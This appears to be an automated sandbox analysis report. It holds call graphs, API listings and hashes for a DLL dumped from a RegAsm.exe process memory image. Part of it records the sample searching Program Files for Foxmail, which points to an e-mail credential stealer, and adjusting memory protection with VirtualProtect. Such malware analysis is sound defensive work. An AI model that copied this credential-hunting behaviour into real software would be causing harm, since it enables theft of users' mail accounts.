10008bef ___scrt_is_nonwritable_in_current_image 7516->7517 7518 10008c13 7517->7518 7519 10008bfc 7517->7519 7529 10005671 RtlEnterCriticalSection 7518->7529 7520 10006368 __dosmaperr 19 API calls 7519->7520 7522 10008c01 7520->7522 7523 100062ac ___std_exception_copy 25 API calls 7522->7523 7525 10008c0b _abort 7523->7525 7525->7515 7527 10008c4b 7537 10008c72 7527->7537 7528 10008c1f 7528->7527 7530 10008b34 7528->7530 7529->7528 7531 1000637b __dosmaperr 19 API calls 7530->7531 7534 10008b46 7531->7534 7532 10008b53 7533 1000571e _free 19 API calls 7532->7533 7535 10008ba5 7533->7535 7534->7532 7536 10005eb7 10 API calls 7534->7536 7535->7528 7536->7534 7540 100056b9 RtlLeaveCriticalSection 7537->7540 7539 10008c79 7539->7525 7540->7539 7648 100081a0 7649 100081d9 7648->7649 7650 100081dd 7649->7650 7661 10008205 7649->7661 7651 10006368 __dosmaperr 19 API calls 7650->7651 7652 100081e2 7651->7652 7654 100062ac ___std_exception_copy 25 API calls 7652->7654 7653 10008529 7655 10002ada _ValidateLocalCookies 5 API calls 7653->7655 7656 100081ed 7654->7656 7657 10008536 7655->7657 7658 10002ada _ValidateLocalCookies 5 API calls 7656->7658 7660 100081f9 7658->7660 7661->7653 7662 100080c0 7661->7662 7665 100080db 7662->7665 7663 10002ada _ValidateLocalCookies 5 API calls 7664 10008152 7663->7664 7664->7661 7665->7663 7849 1000a1e0 7852 1000a1fe 7849->7852 7851 1000a1f6 7853 1000a203 7852->7853 7854 1000aa53 20 API calls 7853->7854 7856 1000a298 7853->7856 7855 1000a42f 7854->7855 7855->7851 7856->7851 7541 10009d61 7542 10009d81 7541->7542 7545 10009db8 7542->7545 7544 10009dab 7546 10009dbf 7545->7546 7547 10009e20 7546->7547 7548 10009ddf 7546->7548 7549 1000aa17 20 API calls 7547->7549 7550 1000a90e 7547->7550 7548->7550 7552 1000aa17 20 API calls 7548->7552 7551 10009e6e 7549->7551 7550->7544 7551->7544 7553 1000a93e 7552->7553 7553->7544 7666 100021a1 ___scrt_dllmain_exception_filter 6481 1000c7a7 6482 1000c7be 6481->6482 6487 1000c82c 6481->6487 6482->6487 6491 1000c7e6 GetModuleHandleA 6482->6491 6483 1000c872 6484 1000c835 GetModuleHandleA 6486 1000c83f 6484->6486 6486->6486 6486->6487 6487->6483 6487->6484 6488 1000c7dd 6488->6487 6489 1000c80d VirtualProtect 6488->6489 6489->6487 6490 1000c81c VirtualProtect 6489->6490 6490->6487 6492 1000c7ef 6491->6492 6497 1000c82c 6491->6497 6501 1000c803 6492->6501 6494 1000c872 6495 1000c835 GetModuleHandleA 6496 1000c83f 6495->6496 6496->6496 6496->6497 6497->6494 6497->6495 6498 1000c7f4 6498->6497 6499 1000c80d VirtualProtect 6498->6499 6499->6497 6500 1000c81c VirtualProtect 6499->6500 6500->6497 6502 1000c809 6501->6502 6503 1000c82c 6502->6503 6504 1000c80d VirtualProtect 6502->6504 6506 1000c872 6503->6506 6507 1000c835 GetModuleHandleA 6503->6507 6504->6503 6505 1000c81c VirtualProtect 6504->6505 6505->6503 6508 1000c83f 6507->6508 6508->6503 7013 1000742b 7014 10007430 7013->7014 7016 10007453 7014->7016 7017 10008bae 7014->7017 7018 10008bdd 7017->7018 7019 10008bbb 7017->7019 7018->7014 7020 10008bd7 7019->7020 7021 10008bc9 RtlDeleteCriticalSection 7019->7021 7022 1000571e _free 19 API calls 7020->7022 7021->7020 7021->7021 7022->7018 7554 1000ac6b 7555 1000ac84 __startOneArgErrorHandling 7554->7555 7557 1000acad __startOneArgErrorHandling 7555->7557 7558 1000b2f0 7555->7558 7559 1000b329 __startOneArgErrorHandling 7558->7559 7560 1000b5c1 __raise_exc RaiseException 7559->7560 7561 1000b350 __startOneArgErrorHandling 7559->7561 7560->7561 7562 1000b393 7561->7562 7563 1000b36e 7561->7563 7564 1000b8b2 __startOneArgErrorHandling 19 API calls 7562->7564 7569 1000b8e1 7563->7569 7566 1000b38e __startOneArgErrorHandling 7564->7566 7567 10002ada _ValidateLocalCookies 5 API calls 7566->7567 7568 1000b3b7 7567->7568 7568->7557 7570 1000b8f0 7569->7570 7571 1000b964 __startOneArgErrorHandling 7570->7571 7572 1000b90f __startOneArgErrorHandling 7570->7572 7574 1000b8b2 __startOneArgErrorHandling 19 API calls 7571->7574 7573 100078a3 __startOneArgErrorHandling 5 API calls 7572->7573 7575 1000b950 7573->7575 7577 1000b95d 7574->7577 7576 1000b8b2 __startOneArgErrorHandling 19 API calls 7575->7576 7575->7577 7576->7577 7577->7566 7667 100060ac 7668 100060dd 7667->7668 7670 100060b7 7667->7670 7669 100060c7 FreeLibrary 7669->7670 7670->7668 7670->7669 7578 1000506f 7579 10005081 7578->7579 7580 10005087 7578->7580 7581 10005000 19 API calls 7579->7581 7581->7580 7023 10005630 7024 1000563b 7023->7024 7026 10005664 7024->7026 7027 10005660 7024->7027 7029 10005eb7 7024->7029 7036 10005688 7026->7036 7030 10005c45 __dosmaperr 4 API calls 7029->7030 7031 10005ede 7030->7031 7032 10005efc InitializeCriticalSectionAndSpinCount 7031->7032 7033 10005ee7 7031->7033 7032->7033 7034 10002ada _ValidateLocalCookies 5 API calls 7033->7034 7035 10005f13 7034->7035 7035->7024 7037 100056b4 7036->7037 7038 10005695 7036->7038 7037->7027 7039 1000569f RtlDeleteCriticalSection 7038->7039 7039->7037 7039->7039 7582 10003370 7593 10003330 7582->7593 7594 10003342 7593->7594 7595 1000334f 7593->7595 7596 10002ada _ValidateLocalCookies 5 API calls 7594->7596 7596->7595 7857 100063f0 7858 10006400 7857->7858 7869 10006416 7857->7869 7859 10006368 __dosmaperr 19 API calls 7858->7859 7860 10006405 7859->7860 7861 100062ac ___std_exception_copy 25 API calls 7860->7861 7863 1000640f 7861->7863 7862 10004e76 19 API calls 7867 100064e5 7862->7867 7865 100064ee 7866 1000571e _free 19 API calls 7865->7866 7868 10006561 7866->7868 7867->7865 7873 10006573 7867->7873 7887 100085eb 7867->7887 7896 1000679a 7868->7896 7869->7868 7870 10006480 7869->7870 7876 10006580 7869->7876 7870->7862 7874 100062bc ___std_exception_copy 11 API calls 7873->7874 7875 1000657f 7874->7875 7877 1000658c 7876->7877 7877->7877 7878 1000637b __dosmaperr 19 API calls 7877->7878 7879 100065ba 7878->7879 7880 100085eb 25 API calls 7879->7880 7881 100065e6 7880->7881 7882 100062bc ___std_exception_copy 11 API calls 7881->7882 7883 10006615 ___scrt_fastfail 7882->7883 7884 100066b6 FindFirstFileExA 7883->7884 7885 10006705 7884->7885 7886 10006580 25 API calls 7885->7886 7888 1000853a 7887->7888 7890 10008554 7888->7890 7891 1000854f 7888->7891 7893 1000858b 7888->7893 7889 10006368 __dosmaperr 19 API calls 7895 1000857a 7889->7895 7890->7867 7891->7889 7891->7890 7892 100062ac ___std_exception_copy 25 API calls 7892->7890 7893->7890 7894 10006368 __dosmaperr 19 API calls 7893->7894 7894->7895 7895->7892 7897 100067a4 7896->7897 7898 100067b4 7897->7898 7899 1000571e _free 19 API calls 7897->7899 7900 1000571e _free 19 API calls 7898->7900 7899->7897 7901 100067bb 7900->7901 7901->7863 7597 10009e71 7598 10009e95 7597->7598 7599 10009ee6 7598->7599 7601 10009f71 __startOneArgErrorHandling 7598->7601 7602 10009ef8 7599->7602 7605 1000aa53 7599->7605 7603 1000b2f0 20 API calls 7601->7603 7604 1000acad __startOneArgErrorHandling 7601->7604 7603->7604 7606 1000aa70 RtlDecodePointer 7605->7606 7608 1000aa80 7605->7608 7606->7608 7607 10002ada _ValidateLocalCookies 5 API calls 7610 1000ac67 7607->7610 7609 1000ab0d 7608->7609 7611 1000ab02 7608->7611 7613 1000aab7 7608->7613 7609->7611 7612 10006368 __dosmaperr 19 API calls 7609->7612 7610->7602 7611->7607 7612->7611 7613->7611 7614 10006368 __dosmaperr 19 API calls 7613->7614 7614->7611 7675 10003eb3 7676 10005411 36 API calls 7675->7676 7677 10003ebb 7676->7677 7040 1000543d 7041 10005440 7040->7041 7042 100055a8 _abort 36 API calls 7041->7042 7043 1000544c 7042->7043 6811 10001f3f 6812 10001f4b ___scrt_is_nonwritable_in_current_image 6811->6812 6829 1000247c 6812->6829 6814 10001f52 6815 10002041 6814->6815 6816 10001f7c 6814->6816 6823 10001f57 ___scrt_is_nonwritable_in_current_image 6814->6823 6852 10002639 IsProcessorFeaturePresent 6815->6852 6840 100023de 6816->6840 6819 10002048 6820 10001f8b __RTC_Initialize 6820->6823 6843 100022fc RtlInitializeSListHead 6820->6843 6822 10001f99 ___scrt_initialize_default_local_stdio_options 6844 100046c5 6822->6844 6827 10001fb8 6827->6823 6828 10004669 _abort 5 API calls 6827->6828 6828->6823 6830 10002485 6829->6830 6856 10002933 IsProcessorFeaturePresent 6830->6856 6834 10002496 6835 1000249a 6834->6835 6867 100053c8 6834->6867 6835->6814 6838 100024b1 6838->6814 6923 100024b5 6840->6923 6842 100023e5 6842->6820 6843->6822 6847 100046dc 6844->6847 6845 10002ada _ValidateLocalCookies 5 API calls 6846 10001fad 6845->6846 6846->6823 6848 100023b3 6846->6848 6847->6845 6849 100023b8 ___scrt_release_startup_lock 6848->6849 6850 10002933 ___isa_available_init IsProcessorFeaturePresent 6849->6850 6851 100023c1 6849->6851 6850->6851 6851->6827 6853 1000264e ___scrt_fastfail 6852->6853 6854 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6853->6854 6855 10002744 ___scrt_fastfail 6854->6855 6855->6819 6857 10002491 6856->6857 6858 100034ea 6857->6858 6859 100034ef ___vcrt_initialize_winapi_thunks 6858->6859 6878 10003936 6859->6878 6862 100034fd 6862->6834 6864 10003505 6865 10003510 6864->6865 6892 10003972 6864->6892 6865->6834 6915 10007457 6867->6915 6870 10003529 6871 10003532 6870->6871 6872 10003543 6870->6872 6873 1000391b ___vcrt_uninitialize_ptd 5 API calls 6871->6873 6872->6835 6874 10003537 6873->6874 6875 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6874->6875 6876 1000353c 6875->6876 6919 10003c50 6876->6919 6880 1000393f 6878->6880 6881 10003968 6880->6881 6882 100034f9 6880->6882 6896 10003be0 6880->6896 6883 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6881->6883 6882->6862 6884 100038e8 6882->6884 6883->6882 6901 10003af1 6884->6901 6887 100038fd 6887->6864 6888 10003ba2 ___vcrt_FlsSetValue 5 API calls 6889 1000390b 6888->6889 6890 10003918 6889->6890 6906 1000391b 6889->6906 6890->6864 6893 1000399c 6892->6893 6894 1000397d 6892->6894 6893->6862 6895 10003987 RtlDeleteCriticalSection 6894->6895 6895->6893 6895->6895 6897 10003a82 try_get_function 4 API calls 6896->6897 6898 10003bfa 6897->6898 6899 10003c18 InitializeCriticalSectionAndSpinCount 6898->6899 6900 10003c03 6898->6900 6899->6900 6900->6880 6902 10003a82 try_get_function 4 API calls 6901->6902 6903 10003b0b 6902->6903 6904 10003b24 TlsAlloc 6903->6904 6905 100038f2 6903->6905 6905->6887 6905->6888 6907 1000392b 6906->6907 6908 10003925 6906->6908 6907->6887 6910 10003b2c 6908->6910 6911 10003a82 try_get_function 4 API calls 6910->6911 6912 10003b46 6911->6912 6913 10003b5e TlsFree 6912->6913 6914 10003b52 6912->6914 6913->6914 6914->6907 6918 10007470 6915->6918 6916 10002ada _ValidateLocalCookies 5 API calls 6917 100024a3 6916->6917 6917->6838 6917->6870 6918->6916 6920 10003c7f 6919->6920 6921 10003c59 6919->6921 6920->6872 6921->6920 6922 10003c69 FreeLibrary 6921->6922 6922->6921 6924 100024c4 6923->6924 6925 100024c8 6923->6925 6924->6842 6926 10002639 ___scrt_fastfail 4 API calls 6925->6926 6928 100024d5 ___scrt_release_startup_lock 6925->6928 6927 10002559 6926->6927 6928->6842 6929 10005bff 6937 10005d5c 6929->6937 6932 10005c13 6933 10005b7a __dosmaperr 19 API calls 6934 10005c1b 6933->6934 6935 10005c28 6934->6935 6944 10005c2b 6934->6944 6938 10005c45 __dosmaperr 4 API calls 6937->6938 6939 10005d83 6938->6939 6940 10005d9b TlsAlloc 6939->6940 6941 10005d8c 6939->6941 6940->6941 6942 10002ada _ValidateLocalCookies 5 API calls 6941->6942 6943 10005c09 6942->6943 6943->6932 6943->6933 6945 10005c3b 6944->6945 6946 10005c35 6944->6946 6945->6932 6948 10005db2 6946->6948 6949 10005c45 __dosmaperr 4 API calls 6948->6949 6950 10005dd9 6949->6950 6951 10005df1 TlsFree 6950->6951 6952 10005de5 6950->6952 6951->6952 6953 10002ada _ValidateLocalCookies 5 API calls 6952->6953 6954 10005e02 6953->6954 6954->6945 7678 100067bf 7683 100067f4 7678->7683 7681 100067db 7682 1000571e _free 19 API calls 7682->7681 7684 100067cd 7683->7684 7685 10006806 7683->7685 7684->7681 7684->7682 7686 10006836 7685->7686 7687 1000680b 7685->7687 7686->7684 7694 100071d6 7686->7694 7688 1000637b __dosmaperr 19 API calls 7687->7688 7689 10006814 7688->7689 7691 1000571e _free 19 API calls 7689->7691 7691->7684 7692 10006851 7693 1000571e _free 19 API calls 7692->7693 7693->7684 7695 100071e1 7694->7695 7696 10007209 7695->7696 7697 100071fa 7695->7697 7698 10007218 7696->7698 7703 10008a98 7696->7703 7699 10006368 __dosmaperr 19 API calls 7697->7699 7710 10008acb 7698->7710 7702 100071ff ___scrt_fastfail 7699->7702 7702->7692 7704 10008aa3 7703->7704 7705 10008ab8 RtlSizeHeap 7703->7705 7706 10006368 __dosmaperr 19 API calls 7704->7706 7705->7698 7707 10008aa8 7706->7707 7708 100062ac ___std_exception_copy 25 API calls 7707->7708 7709 10008ab3 7708->7709 7709->7698 7711 10008ae3 7710->7711 7712 10008ad8 7710->7712 7714 10008aeb 7711->7714 7720 10008af4 __dosmaperr 7711->7720 7713 100056d0 20 API calls 7712->7713 7719 10008ae0 7713->7719 7717 1000571e _free 19 API calls 7714->7717 7715 10008af9 7718 10006368 __dosmaperr 19 API calls 7715->7718 7716 10008b1e RtlReAllocateHeap 7716->7719 7716->7720 7717->7719 7718->7719 7719->7702 7720->7715 7720->7716 7721 1000474f __dosmaperr 7 API calls 7720->7721 7721->7720

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1083526818-0
                                                                                                                                              • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                              • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                              • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                              • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                                                              • API String ID: 672098462-2938083778
                                                                                                                                              • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                              • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                              • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                              • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 54 10008821-1000883a 55 10008850-10008855 54->55 56 1000883c-1000884c call 10009341 54->56 58 10008862-10008886 MultiByteToWideChar 55->58 59 10008857-1000885f 55->59 56->55 63 1000884e 56->63 61 10008a19-10008a2c call 10002ada 58->61 62 1000888c-10008898 58->62 59->58 64 1000889a-100088ab 62->64 65 100088ec 62->65 63->55 68 100088ca-100088db call 100056d0 64->68 69 100088ad-100088bc call 1000bf20 64->69 67 100088ee-100088f0 65->67 71 100088f6-10008909 MultiByteToWideChar 67->71 72 10008a0e 67->72 68->72 82 100088e1 68->82 69->72 81 100088c2-100088c8 69->81 71->72 75 1000890f-10008921 call 10005f19 71->75 76 10008a10-10008a17 call 10008801 72->76 84 10008926-1000892a 75->84 76->61 83 100088e7-100088ea 81->83 82->83 83->67 84->72 86 10008930-10008937 84->86 87 10008971-1000897d 86->87 88 10008939-1000893e 86->88 90 100089c9 87->90 91 1000897f-10008990 87->91 88->76 89 10008944-10008946 88->89 89->72 94 1000894c-10008966 call 10005f19 89->94 95 100089cb-100089cd 90->95 92 10008992-100089a1 call 1000bf20 91->92 93 100089ab-100089bc call 100056d0 91->93 99 10008a07-10008a0d call 10008801 92->99 106 100089a3-100089a9 92->106 93->99 108 100089be 93->108 94->76 109 1000896c 94->109 95->99 100 100089cf-100089e8 call 10005f19 95->100 99->72 100->99 112 100089ea-100089f1 100->112 111 100089c4-100089c7 106->111 108->111 109->72 111->95 113 100089f3-100089f4 112->113 114 10008a2d-10008a33 112->114 115 100089f5-10008a05 WideCharToMultiByte 113->115 114->115 115->99 116 10008a35-10008a3c call 10008801 115->116 116->76
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                              • __freea.LIBCMT ref: 10008A08
                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                              • __freea.LIBCMT ref: 10008A11
                                                                                                                                              • __freea.LIBCMT ref: 10008A36
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                              • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                              • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                              • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                              • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 119 1000c7e6-1000c7ed GetModuleHandleA 120 1000c82d 119->120 121 1000c7ef-1000c7fe call 1000c803 119->121 123 1000c82f-1000c833 120->123 131 1000c800 121->131 132 1000c865 121->132 124 1000c872 call 1000c877 123->124 125 1000c835-1000c83d GetModuleHandleA 123->125 127 1000c83f-1000c847 125->127 127->127 130 1000c849-1000c84c 127->130 130->123 133 1000c84e-1000c850 130->133 135 1000c809-1000c80b 131->135 136 1000c804 call 1000c897 131->136 134 1000c866-1000c86e 132->134 137 1000c852-1000c854 133->137 138 1000c856-1000c85e 133->138 143 1000c870 134->143 135->120 140 1000c80d-1000c81a VirtualProtect 135->140 136->135 141 1000c85f-1000c860 call 1000c897 137->141 138->141 144 1000c82c 140->144 145 1000c81c-1000c82a VirtualProtect 140->145 141->132 143->130 144->120 145->144
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModuleProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2905821283-0
                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                              • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                              • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 147 10005ce1-10005cf5 148 10005d02-10005d1d LoadLibraryExW 147->148 149 10005cf7-10005d00 147->149 151 10005d46-10005d4c 148->151 152 10005d1f-10005d28 GetLastError 148->152 150 10005d59-10005d5b 149->150 155 10005d55 151->155 156 10005d4e-10005d4f FreeLibrary 151->156 153 10005d37 152->153 154 10005d2a-10005d35 LoadLibraryExW 152->154 157 10005d39-10005d3b 153->157 154->157 158 10005d57-10005d58 155->158 156->155 157->151 159 10005d3d-10005d44 157->159 158->150 159->158
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                              • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                              • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                              • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                              • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                              • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 160 1000c7a7-1000c7bc 161 1000c82d 160->161 162 1000c7be-1000c7c6 160->162 164 1000c82f-1000c833 161->164 162->161 163 1000c7c8-1000c7f6 call 1000c7e6 162->163 172 1000c7f8 163->172 173 1000c86c-1000c86e 163->173 165 1000c872 call 1000c877 164->165 166 1000c835-1000c83d GetModuleHandleA 164->166 168 1000c83f-1000c847 166->168 168->168 171 1000c849-1000c84c 168->171 171->164 174 1000c84e-1000c850 171->174 175 1000c7fa-1000c7fe 172->175 176 1000c85b-1000c85e 172->176 177 1000c870 173->177 178 1000c866-1000c86b 173->178 179 1000c852-1000c854 174->179 180 1000c856-1000c85a 174->180 184 1000c800 175->184 185 1000c865 175->185 181 1000c85f-1000c860 call 1000c897 176->181 177->171 178->173 179->181 180->176 181->185 186 1000c809-1000c80b 184->186 187 1000c804 call 1000c897 184->187 185->178 186->161 188 1000c80d-1000c81a VirtualProtect 186->188 187->186 189 1000c82c 188->189 190 1000c81c-1000c82a VirtualProtect 188->190 189->161 190->189
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
